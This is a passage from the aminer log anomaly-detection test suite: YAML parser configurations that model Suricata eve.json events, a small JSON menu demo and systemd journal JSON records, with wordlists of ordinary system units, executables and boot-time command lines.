'flows_notimeout' - id: flows_timeout type: DecimalIntegerValueModelElement name: 'flows_timeout' - id: flows_timeout_inuse type: DecimalIntegerValueModelElement name: 'flows_timeout_inuse' - id: flows_removed type: DecimalIntegerValueModelElement name: 'flows_removed' - id: rows_checked type: DecimalIntegerValueModelElement name: 'rows_checked' - id: rows_skipped type: DecimalIntegerValueModelElement name: 'rows_skipped' - id: rows_empty type: DecimalIntegerValueModelElement name: 'rows_empty' - id: rows_busy type: DecimalIntegerValueModelElement name: 'rows_busy' - id: rows_maxlen type: DecimalIntegerValueModelElement name: 'rows_maxlen' - id: memcap_state type: DecimalIntegerValueModelElement name: 'memcap_state' - id: memcap_global type: DecimalIntegerValueModelElement name: 'memcap_global' - id: tcp_flags type: FixedWordlistDataModelElement name: 'tcp_flags' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_ts type: FixedWordlistDataModelElement name: 'tcp_flags_ts' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_tc type: FixedWordlistDataModelElement name: 'tcp_flags_tc' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'ET POLICY Http Client Body contains pass= in cleartext' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Potential Corporate Privacy Violation' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: subject type: FixedDataModelElement name: 'subject' args: 'CN=mail.spiral.com' - id: issuerdn type: FixedDataModelElement name: 'issuerdn' args: 'CN=ChangeMe' - id: fingerprint 
type: FixedDataModelElement name: 'fingerprint' args: '4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17' - id: sni type: FixedDataModelElement name: 'sni' args: 'mail.spiral.com' - id: version type: FixedDataModelElement name: 'version' args: 'TLS 1.2' - id: notbefore type: DateTimeModelElement name: 'notbefore' date_format: '%Y-%m-%dT%H:%M:%S' - id: notafter type: DateTimeModelElement name: 'notafter' date_format: '%Y-%m-%dT%H:%M:%S' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp _flow_id: _flow_id _in_iface: _in_iface event_type: event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _icmp_type: _icmp_type _icmp_code: _icmp_code _dns: type: type id: id _rcode: _rcode rrname: rrname _rrtype: _rrtype _ttl: _ttl _tx_id: _tx_id _tx_id: _tx_id _http: hostname: hostname url: url http_user_agent: http_user_agent _http_content_type: _http_content_type _http_refer: _http_refer http_method: http_method protocol: protocol _redirect: _redirect _status: _status length: length _app_proto: _app_proto _app_proto_tc: _app_proto_tc _fileinfo: filename: url state: file_state stored: bool_wordlist size: size _tx_id: _tx_id _flow: pkts_toserver: pkts_toserver pkts_toclient: pkts_toclient bytes_toserver: bytes_toserver bytes_toclient: bytes_toclient start: start end: end age: age state: conn_state reason: reason alerted: bool_wordlist _stats: uptime: uptime capture: kernel_packets: kernel_packets kernel_drops: kernel_drops decoder: pkts: pkts bytes: bytes invalid: invalid ipv4: ipv4 ipv6: ipv6 ethernet: ethernet raw: raw null: null_counts sll: sll tcp: tcp udp: udp sctp: sctp icmpv4: icmpv4 icmpv6: icmpv6 ppp: ppp pppoe: pppoe gre: gre vlan: vlan vlan_qinq: vlan_qinq teredo: teredo ipv4_in_ipv6: ipv4_in_ipv6 ipv6_in_ipv6: ipv6_in_ipv6 mpls: mpls avg_pkt_size: avg_pkt_size max_pkt_size: max_pkt_size erspan: erspan ipraw: invalid_ip_version: 
invalid_ip_version ltnull: pkt_too_small: pkt_too_small unsupported_type: unsupported_type dce: pkt_too_small: pkt_too_small flow: memcap: memcap spare: spare emerg_mode_entered: emerg_mode_entered emerg_mode_over: emerg_mode_over tcp_reuse: tcp_reuse memuse: memuse defrag: ipv4: fragments: fragments reassembled: reassembled timeouts: timeouts ipv6: fragments: fragments reassembled: reassembled timeouts: timeouts max_frag_hits: max_frag_hits tcp: sessions: sessions ssn_memcap_drop: ssn_memcap_drop pseudo: pseudo pseudo_failed: pseudo_failed invalid_checksum: invalid_checksum no_flow: no_flow syn: syn synack: synack rst: rst segment_memcap_drop: segment_memcap_drop stream_depth_reached: stream_depth_reached reassembly_gap: reassembly_gap memuse: memuse reassembly_memuse: reassembly_memuse detect: alert: alert app_layer: flow: http: http ftp: ftp smtp: smtp tls: tls ssh: ssh imap: imap msn: msn smb: smb dcerpc_tcp: dcerpc_tcp dns_tcp: dns_tcp failed_tcp: failed_tcp dcerpc_udp: dcerpc_udp dns_udp: dns_udp failed_udp: failed_udp tx: http: http smtp: smtp tls: tls dns_tcp: dns_tcp dns_udp: dns_udp flow_mgr: closed_pruned: closed_pruned new_pruned: new_pruned est_pruned: est_pruned bypassed_pruned: bypassed_pruned flows_checked: flows_checked flows_notimeout: flows_notimeout flows_timeout: flows_timeout flows_timeout_inuse: flows_timeout_inuse flows_removed: flows_removed rows_checked: rows_checked rows_skipped: rows_skipped rows_empty: rows_empty rows_busy: rows_busy rows_maxlen: rows_maxlen dns: memuse: memuse memcap_state: memcap_state memcap_global: memcap_global http: memuse: memuse memcap: memcap _tcp: tcp_flags: tcp_flags tcp_flags_ts: tcp_flags_ts tcp_flags_tc: tcp_flags_tc syn: bool_wordlist _fin: bool_wordlist _rst: bool_wordlist _psh: bool_wordlist ack: bool_wordlist state: conn_state _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _tls: subject: subject issuerdn: issuerdn 
fingerprint: fingerprint sni: sni version: version notbefore: notbefore notafter: notafter Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-input-demo-config.yml000066400000000000000000000042471437606560100327100ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: id type: VariableByteDataModelElement name: 'id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: value type: VariableByteDataModelElement name: 'value' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' 
- id: buttonNames type: FixedWordlistDataModelElement name: 'buttonNames' args: - 'New' - 'Open' - 'Close' - id: buttonOnclick type: FixedWordlistDataModelElement name: 'buttonOnclick' args: - 'CreateNewDoc()' - 'OpenDoc()' - 'CloseDoc()' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: menu: id: id value: value popup: menuitem: - value: buttonNames onclick: buttonOnclick Input: timestamp_paths: None json_format: True Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/menu/id" - "/model/menu/value" learn_mode: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/menu/id" - "/model/menu/value" learn_mode: True - type: SimpleUnparsedAtomHandler id: SimpleUnparsedAtomHandler EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-journal-demo.yml000066400000000000000000000765451437606560100317720ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/journal.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: delimiter type: DelimitedDataModelElement name: 'delimiter' delimiter: '=' consume_delimiter: true - id: hex type: HexStringModelElement name: 'hex' - id: __CURSOR type: SequenceModelElement name: '__CURSOR' args: - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - id: __REALTIME_TIMESTAMP type: DateTimeModelElement name: '__REALTIME_TIMESTAMP' 
date_format: '%s' - id: __MONOTONIC_TIMESTAMP type: DateTimeModelElement name: '__MONOTONIC_TIMESTAMP' date_format: '%s' - id: _BOOT_ID type: HexStringModelElement name: '_BOOT_ID' - id: optional_key__SOURCE_MONOTONIC_TIMESTAMP type: DateTimeModelElement name: 'optional_key__SOURCE_MONOTONIC_TIMESTAMP' date_format: '%s' - id: _TRANSPORT type: FixedWordlistDataModelElement name: '_TRANSPORT' args: - 'kernel' - 'stdout' - 'driver' - 'journal' - 'audit' - 'syslog' - id: optional_key_PRIORITY type: DecimalIntegerValueModelElement name: 'optional_key_PRIORITY' - id: optional_key__KERNEL_SUBSYSTEM type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_SUBSYSTEM' args: - 'acpi' - 'pci_bus' - 'pci' - 'ubs' - 'pnp' - 'scsi' - 'usb' - 'misc' - 'virtio' - 'hid' - id: optional_key__KERNEL_DEVICE type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_DEVICE' args: - '+acpi:PNP0A03:00' - '+pci_bus:0000:00' - '+pci:0000:00:00.0' - '+pci:0000:00:01.0' - '+pci:0000:00:01.1' - '+pci:0000:00:01.2' - '+pci:0000:00:01.3' - '+pci:0000:00:02.0' - '+pci:0000:00:03.0' - '+pci:0000:00:04.0' - '+pci:0000:00:05.0' - '+pnp:00:00' - '+pnp:00:01' - '+pnp:00:02' - '+pnp:00:03' - '+pnp:00:04' - '+scsi:host0' - '+scsi:host1' - 'c189:0' - '+usb:1-0:1.0' - '+usb:1-1' - 'c10:236' - '+virtio:virtio0' - 'c189:1' - '+hid:0003:0627:0001.0001' - id: optional_key__UDEV_DEVNODE type: FixedWordlistDataModelElement name: 'optional_key__UDEV_DEVNODE' args: - '/dev/bus/usb/001/001' - '/dev/bus/usb/001/002' - '/dev/mapper/control' - id: optional_key__UDEV_SYSNAME type: FixedWordlistDataModelElement name: 'optional_key__UDEV_SYSNAME' args: - 'PNP0A03:00' - 'usb1' - 'host0' - 'host1' - '00:00' - '00:01' - '00:02' - '00:03' - '00:04' - '0000:00:00.0' - '0000:00:01.0' - '0000:00:01.1' - '0000:00:01.2' - '0000:00:01.3' - '0000:00:02.0' - '0000:00:03.0' - '0000:00:04.0' - '0000:00:05.0' - '0000:00' - '1-0:1.0' - '1-1' - 'device-mapper' - 'virtio0' - '0003:0627:0001.0001' - id: SYSLOG_FACILITY type: 
DecimalIntegerValueModelElement name: 'SYSLOG_FACILITY' - id: optional_key_CODE_FILE type: FixedWordlistDataModelElement name: 'optional_key_CODE_FILE' args: - '../src/modules-load/modules-load.c' - '../src/core/unit.c' - '../src/udev/net/ethtool-util.c' - '../src/network/networkd.c' - '../src/resolve/resolved-dns-trust-anchor.c' - '../src/login/logind-seat.c' - '../src/core/manager.c' - '../src/login/logind-session.c' - '../src/core/job.c' - '../src/network/networkd-link.c' - '../src/timesync/timesyncd-manager.c' - '../src/network/networkd-dhcp6.c' - '../src/network/networkd-dhcp4.c' - '../src/resolve/resolved-manager.c' - '../src/network/wait-online/manager.c' - '../src/network/networkd-manager.c' - '../src/login/logind-button.c' - '../src/hostname/hostnamed.c' - '../src/resolve/resolved-dns-transaction.c' - id: optional_key_CODE_LINE type: DecimalIntegerValueModelElement name: 'optional_key_CODE_LINE' - id: optional_key_CODE_FUNC type: FixedWordlistDataModelElement name: 'optional_key_CODE_FUNC' args: - 'load_module' - 'unit_status_log_starting_stopping_reloading' - 'job_log_status_message' - 'ethtool_set_glinksettings' - 'main' - 'dns_trust_anchor_dump' - 'seat_start' - 'manager_notify_finished' - 'session_start' - 'link_update' - 'manager_network_event_handler' - 'link_ipv6ll_gained' - 'dhcp6_verify_link' - 'link_enable_ipv6' - 'dhcp_lease_acquired' - 'manager_watch_hostname' - 'link_enter_configured' - 'manager_all_configured' - 'manager_set_hostname' - 'button_open' - 'method_set_hostname' - 'manager_receive_response' - 'dns_transaction_process_reply' - id: optional_key_INTERFACE type: FixedWordlistDataModelElement name: 'optional_key_INTERFACE' args: - 'ens3' - 'lo' - id: SYSLOG_IDENTIFIER type: FixedWordlistDataModelElement name: 'SYSLOG_IDENTIFIER' args: - 'kernel' - 'stdout' - 'systemd-journald' - 'systemd-modules-load' - 'systemd-udevd' - 'systemd-networkd-wait-online' - 'systemd-timesyncd' - 'systemd-resolved' - 'systemd-networkd' - 'systemd-logind' - 
'systemd-hostnamed' - 'systemd' - 'apparmor' - 'audit' - 'dhclient' - 'cloud-init' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - '/usr/sbin/irqbalance' - 'apport' - 'pollinate' - 'dbus-daemon' - 'polkitd' - 'grub-common' - 'lxcfs' - 'accounts-daemon' - 'networkd-dispatcher' - 'snapd' - 'sshd' - '/usr/bin/logger' - 'ec2' - 'sudo' - id: optional_key_SYSLOG_PID type: DecimalIntegerValueModelElement name: 'optional_key_SYSLOG_PID' - id: optional_key_MESSAGE_ID type: HexStringModelElement name: 'optional_key_MESSAGE_ID' - id: optional_key_SEAT_ID type: FixedWordlistDataModelElement name: 'optional_key_SEAT_ID' args: - 'seat0' - id: msg type: AnyByteDataModelElement name: 'msg' - id: MESSAGE type: OptionalMatchModelElement name: 'MESSAGE' args: msg - id: optional_key__MACHINE_ID type: HexStringModelElement name: 'optional_key__MACHINE_ID' - id: optional_key__HOSTNAME type: FixedWordlistDataModelElement name: 'optional_key__HOSTNAME' args: - 'ubuntu' - 'test-1' - id: optional_key__PID type: DecimalIntegerValueModelElement name: 'optional_key__PID' - id: optional_key__UID type: DecimalIntegerValueModelElement name: 'optional_key__UID' - id: optional_key__GID type: DecimalIntegerValueModelElement name: 'optional_key__GID' - id: optional_key__COMM type: FixedWordlistDataModelElement name: 'optional_key__COMM' args: - 'systemd-journal' - 'apparmor_parser' - 'apparmor' - 'systemd-udevd' - 'dhclient' - 'systemd-network' - 'systemd-timesyn' - 'systemd-resolve' - 'useradd' - 'rsyslogd' - 'passwd' - 'cron' - 'dbus-daemon' - 'polkitd' - 'lxcfs' - 'accounts-daemon' - 'systemd-logind' - 'systemd-hostnam' - 'systemd' - 'networkd-dispat' - 'snapd' - 'sshd' - 'sudo' - 'cloud-init' - 'logger' - '(systemd)' - id: optional_key__EXE type: FixedWordlistDataModelElement name: 'optional_key__EXE' args: - '/lib/systemd/systemd-journald' - '/bin/dash' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient' - '/usr/bin/python3.6' - '/lib/systemd/systemd-networkd' 
- '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - '/usr/sbin/useradd' - '/usr/sbin/rsyslogd' - '/usr/bin/passwd' - '/usr/sbin/cron' - '/usr/bin/dbus-daemon' - '/usr/lib/policykit-1/polkitd' - '/usr/bin/lxcfs' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd' - '/usr/bin/logger' - '/usr/bin/sudo' - '/lib/systemd/systemd' - id: optional_key__CMDLINE type: FixedWordlistDataModelElement name: 'optional_key__CMDLINE' args: - '/lib/systemd/systemd-journald' - '/bin/sh /etc/init.d/apparmor start' - '/lib/systemd/systemd-udevd' - '/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true' - '/usr/bin/python3 /usr/bin/cloud-init init --local' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=final' - '/lib/systemd/systemd-networkd' - '/lib/systemd/systemd-timesyncd' - '/lib/systemd/systemd-resolved' - 'useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m' - '/usr/sbin/rsyslogd -n' - 'passwd -l ubuntu' - '/usr/sbin/cron -f' - '/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only' - '/usr/lib/policykit-1/polkitd --no-debug' - '/usr/bin/lxcfs /var/lib/lxcfs/' - '/usr/lib/accountsservice/accounts-daemon' - '/lib/systemd/systemd-logind' - '/lib/systemd/systemd-hostnamed' - '/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers' - '/usr/lib/snapd/snapd' - '/usr/sbin/sshd -D' - 'logger -p user info -t ec2 -s' - 'sudo -i' - '/sbin/init' - '/usr/bin/python3 /usr/bin/cloud-init init' - 'logger --id=787 -t pollinate client verified challenge/response with [https://entropy.ubuntu.com/]' - 'logger --id=787 -t pollinate client hashed response from [https://entropy.ubuntu.com/]' 
- 'logger --id=787 -t pollinate client successfully seeded [/dev/urandom]' - '/usr/bin/python3 /usr/bin/cloud-init modules --mode=config' - 'sshd: ubuntu [priv]' - '(systemd)' - '/lib/systemd/systemd --user' - id: optional_key__CAP_EFFECTIVE type: HexStringModelElement name: 'optional_key__CAP_EFFECTIVE' - id: optional_key__SELINUX_CONTEXT type: FixedWordlistDataModelElement name: 'optional_key__SELINUX_CONTEXT' args: - 'unconfined\n' - id: optional_key__SYSTEMD_CGROUP type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_CGROUP' args: - '/system.slice/systemd-journald.service' - '/system.slice/apparmor.service' - '/system.slice/systemd-udevd.service' - '/system.slice/cloud-init-local.service' - '/system.slice/systemd-networkd.service' - '/system.slice/systemd-timesyncd.service' - '/system.slice/systemd-resolved.service' - '/system.slice/systemd-networkd-wait-online.service' - '/system.slice/rsyslog.service' - '/system.slice/cron.service' - '/system.slice/dbus.service' - '/system.slice/polkit.service' - '/system.slice/lxcfs.service' - '/system.slice/accounts-daemon.service' - '/system.slice/systemd-logind.service' - '/system.slice/systemd-hostnamed.service' - '/system.slice/networkd-dispatcher.service' - '/system.slice/snapd.service' - '/system.slice/ssh.service' - '/system.slice/cloud-final.service' - '/system.slice/cloud-init.service' - '/system.slice/pollinate.service' - '/system.slice/cloud-config.service' - '/user.slice/user-1000.slice/session-1.scope' - '/init.scope' - '/user.slice/user-1000.slice/user@1000.service/init.scope' - '/user.slice/user-1000.slice/user@1000.service' - id: optional_key__SYSTEMD_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_UNIT' args: - 'systemd-journald.service' - 'systemd-networkd.service' - 'systemd-timesyncd.service' - 'systemd-resolved.service' - 'systemd-networkd-wait-online.service' - 'systemd-udevd.service' - 'systemd-logind.service' - 'systemd-hostnamed.service' - 'apparmor.service' - 
'cloud-init-local.service' - 'rsyslog.service' - 'cron.service' - 'apport.service' - 'dbus.service' - 'polkit.service' - 'grub-common.service' - 'lxcfs.service' - 'accounts-daemon.service' - 'networkd-dispatcher.service' - 'snapd.service' - 'ssh.service' - 'cloud-final.service' - 'session-1.scope' - 'init.scope' - 'cloud-init.service' - 'pollinate.service' - 'cloud-config.service' - 'user@1000.service' - id: optional_key__SYSTEMD_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_SLICE' args: - 'system.slice' - '-.slice' - 'user-1000.slice' - id: optional_key__SYSTEMD_INVOCATION_ID type: HexStringModelElement name: 'optional_key__SYSTEMD_INVOCATION_ID' - id: optional_key_JOURNAL_NAME type: FixedWordlistDataModelElement name: 'optional_key_JOURNAL_NAME' args: - 'Runtime journal' - 'System journal' - id: fixed_journal_paths type: FixedWordlistDataModelElement name: 'fixed_journal_paths' args: - '/var/log/journal/' - '/run/log/journal/' - id: optional_key_JOURNAL_PATH type: SequenceModelElement name: 'optional_key_JOURNAL_PATH' args: - fixed_journal_paths - hex - id: optional_key_CURRENT_USE type: DecimalIntegerValueModelElement name: 'optional_key_CURRENT_USE' - id: float_number type: DecimalFloatValueModelElement name: 'float_number' - id: memory type: FixedWordlistDataModelElement name: 'memory' args: - 'M' - 'G' - 'K' - id: optional_key_CURRENT_USE_PRETTY type: SequenceModelElement name: 'optional_key_CURRENT_USE_PRETTY' args: - float_number - memory - id: optional_key_MAX_USE type: DecimalIntegerValueModelElement name: 'optional_key_MAX_USE' - id: optional_key_MAX_USE_PRETTY type: SequenceModelElement name: 'optional_key_MAX_USE_PRETTY' args: - float_number - memory - id: optional_key_DISK_KEEP_FREE type: DecimalIntegerValueModelElement name: 'optional_key_DISK_KEEP_FREE' - id: optional_key_DISK_KEEP_FREE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_KEEP_FREE_PRETTY' args: - float_number - memory - id: optional_key_DISK_AVAILABLE 
type: DecimalIntegerValueModelElement name: 'optional_key_DISK_AVAILABLE' - id: optional_key_DISK_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_DISK_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key_LIMIT type: DecimalIntegerValueModelElement name: 'optional_key_LIMIT' - id: optional_key_LIMIT_PRETTY type: SequenceModelElement name: 'optional_key_LIMIT_PRETTY' args: - float_number - memory - id: optional_key_AVAILABLE type: DecimalIntegerValueModelElement name: 'optional_key_AVAILABLE' - id: optional_key_AVAILABLE_PRETTY type: SequenceModelElement name: 'optional_key_AVAILABLE_PRETTY' args: - float_number - memory - id: optional_key__SOURCE_REALTIME_TIMESTAMP type: DecimalIntegerValueModelElement name: 'optional_key__SOURCE_REALTIME_TIMESTAMP' - id: optional_key_JOB_TYPE type: FixedWordlistDataModelElement name: 'optional_key_JOB_TYPE' args: - 'start' - id: optional_key_JOB_RESULT type: FixedWordlistDataModelElement name: 'optional_key_JOB_RESULT' args: - 'done' - id: optional_key_UNIT type: FixedWordlistDataModelElement name: 'optional_key_UNIT' args: - 'systemd-udevd.service' - 'systemd-journal-flush.service' - 'systemd-sysctl.service' - 'systemd-udev-trigger.service' - 'systemd-machine-id-commit.service' - 'systemd-update-utmp.service' - 'systemd-ask-password-console.path' - 'systemd-tmpfiles-setup.service' - 'systemd-timesyncd.service' - 'systemd-networkd.service' - 'systemd-networkd-wait-online.service' - 'systemd-resolved.service' - 'systemd-tmpfiles-clean.timer' - 'systemd-logind.service' - 'systemd-user-sessions.service' - 'systemd-hostnamed.service' - 'systemd-update-utmp-runlevel.service' - 'network-online.target' - 'keyboard-setup.service' - 'cryptsetup.target' - 'local-fs-pre.target' - 'dev-ttyS0.device' - 'systemd-rfkill.socket' - 'dev-disk-by-label-UEFI.device' - 'boot-efi.mount' - 'local-fs.target' - 'plymouth-read-write.service' - 'console-setup.service' - 'ebtables.service' - 'apparmor.service' - 
'time-sync.target' - 'cloud-init-local.service' - 'network-pre.target' - 'nss-lookup.target' - 'network.target' - 'cloud-init.service' - 'blk-availability.service' - 'remote-fs-pre.target' - 'remote-fs.target' - 'cloud-config.target' - 'sysinit.target' - 'uuidd.socket' - 'snapd.socket' - 'motd-news.timer' - 'dbus.socket' - 'apt-daily.timer' - 'apt-daily-upgrade.timer' - 'lxd.socket' - 'iscsid.socket' - 'fstrim.timer' - 'timers.target' - 'acpid.path' - 'acpid.socket' - 'paths.target' - 'basic.target' - 'lxd-containers.service' - 'atd.service' - 'cron.service' - 'sockets.target' - 'networkd-dispatcher.service' - 'apport.service' - 'irqbalance.service' - 'rsyslog.service' - 'accounts-daemon.service' - 'pollinate.service' - 'grub-common.service' - 'lxcfs.service' - 'dbus.service' - 'snapd.service' - 'polkit.service' - 'unattended-upgrades.service' - 'plymouth-quit.service' - 'plymouth-quit-wait.service' - 'serial-getty@ttyS0.service' - 'setvtrgb.service' - 'system-getty.slice' - 'getty@tty1.service' - 'getty.target' - 'ssh.service' - 'snapd.seeded.service' - 'cloud-config.service' - 'multi-user.target' - 'graphical.target' - 'cloud-final.service' - 'cloud-init.target' - 'user-1000.slice' - 'user@1000.service' - 'session-1.scope' - id: optional_key_INVOCATION_ID type: HexStringModelElement name: 'optional_key_INVOCATION_ID' - id: optional_key__STREAM_ID type: HexStringModelElement name: 'optional_key__STREAM_ID' - id: optional_key__AUDIT_TYPE type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_TYPE' - id: optional_key__AUDIT_ID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_ID' - id: optional_key__AUDIT_FIELD_APPARMOR type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_APPARMOR' args: - '"STATUS"' - id: optional_key__AUDIT_FIELD_OPERATION type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_OPERATION' args: - '"profile_load"' - id: optional_key__AUDIT_FIELD_PROFILE type: FixedWordlistDataModelElement name: 
'optional_key__AUDIT_FIELD_PROFILE' args: - '"unconfined"' - id: optional_key__AUDIT_FIELD_NAME type: FixedWordlistDataModelElement name: 'optional_key__AUDIT_FIELD_NAME' args: - 'lxc-container-default-cgns' - 'lxc-container-default-with-mounting' - 'lxc-container-default-with-nesting' - 'lxc-container-default' - '/usr/lib/NetworkManager/nm-dhcp-client.action' - '/usr/lib/NetworkManager/nm-dhcp-helper' - '/usr/lib/connman/scripts/dhclient-script' - '/usr/lib/snapd/snap-confine//mount-namespace-capture-helper' - '/usr/bin/lxc-start' - '/usr/bin/man' - '/usr/lib/snapd/snap-confine' - '/usr/sbin/tcpdump' - 'man_filter' - 'man_groff' - '/sbin/dhclient' - id: optional_key_ADDRESS type: IpAddressDataModelElement name: 'optional_key_ADDRESS' - id: optional_key_PREFIXLEN type: DecimalIntegerValueModelElement name: 'optional_key_PREFIXLEN' - id: optional_key_GATEWAY type: IpAddressDataModelElement name: 'optional_key_GATEWAY' - id: optional_key__AUDIT_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_SESSION' - id: optional_key__AUDIT_LOGINUID type: DecimalIntegerValueModelElement name: 'optional_key__AUDIT_LOGINUID' - id: optional_key_SESSION_ID type: DecimalIntegerValueModelElement name: 'optional_key_SESSION_ID' - id: optional_key_USER_ID type: FixedWordlistDataModelElement name: 'optional_key_USER_ID' args: - 'ubuntu' - id: optional_key_LEADER type: DecimalIntegerValueModelElement name: 'optional_key_LEADER' - id: optional_key_KERNEL_USEC type: DecimalIntegerValueModelElement name: 'optional_key_KERNEL_USEC' - id: optional_key_USERSPACE_USEC type: DecimalIntegerValueModelElement name: 'optional_key_USERSPACE_USEC' - id: optional_key__SYSTEMD_OWNER_UID type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_OWNER_UID' - id: optional_key_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key_USER_UNIT' args: - 'gpg-agent-ssh.socket' - 'gpg-agent-browser.socket' - 'gpg-agent-extra.socket' - 'paths.target' - 'dirmngr.socket' - 
'gpg-agent.socket' - 'sockets.target' - 'basic.target' - 'default.target' - 'timers.target' - id: optional_key_USER_INVOCATION_ID type: HexStringModelElement name: 'optional_key_USER_INVOCATION_ID' - id: optional_key__SYSTEMD_USER_SLICE type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_SLICE' args: - '-.slice' - id: optional_key__SYSTEMD_USER_UNIT type: FixedWordlistDataModelElement name: 'optional_key__SYSTEMD_USER_UNIT' args: - 'init.scope' - 'cloud-config.service' - id: optional_key__SYSTEMD_SESSION type: DecimalIntegerValueModelElement name: 'optional_key__SYSTEMD_SESSION' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: __CURSOR: __CURSOR __REALTIME_TIMESTAMP: __REALTIME_TIMESTAMP __MONOTONIC_TIMESTAMP: __MONOTONIC_TIMESTAMP _BOOT_ID: _BOOT_ID optional_key__SOURCE_MONOTONIC_TIMESTAMP: optional_key__SOURCE_MONOTONIC_TIMESTAMP _TRANSPORT: _TRANSPORT optional_key_PRIORITY: optional_key_PRIORITY optional_key__KERNEL_SUBSYSTEM: optional_key__KERNEL_SUBSYSTEM optional_key__KERNEL_DEVICE: optional_key__KERNEL_DEVICE optional_key__UDEV_DEVNODE: optional_key__UDEV_DEVNODE optional_key__UDEV_SYSNAME: optional_key__UDEV_SYSNAME SYSLOG_FACILITY: SYSLOG_FACILITY optional_key_CODE_FILE: optional_key_CODE_FILE optional_key_CODE_LINE: optional_key_CODE_LINE optional_key_CODE_FUNC: optional_key_CODE_FUNC optional_key_INTERFACE: optional_key_INTERFACE SYSLOG_IDENTIFIER: SYSLOG_IDENTIFIER optional_key_SYSLOG_PID: optional_key_SYSLOG_PID optional_key_MESSAGE_ID: optional_key_MESSAGE_ID optional_key_SEAT_ID: optional_key_SEAT_ID MESSAGE: MESSAGE optional_key__MACHINE_ID: optional_key__MACHINE_ID optional_key__HOSTNAME: optional_key__HOSTNAME optional_key__PID: optional_key__PID optional_key__UID: optional_key__UID optional_key__GID: optional_key__GID optional_key__COMM: optional_key__COMM 